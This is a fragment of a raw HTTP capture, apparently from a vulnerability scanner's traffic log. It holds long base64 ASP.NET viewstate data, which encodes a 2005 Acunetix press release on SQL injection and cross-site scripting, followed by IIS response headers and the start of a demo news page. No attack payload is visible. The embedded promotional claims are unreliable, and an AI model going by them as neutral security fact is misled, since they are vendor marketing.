GVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 30429Response body (30429 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdm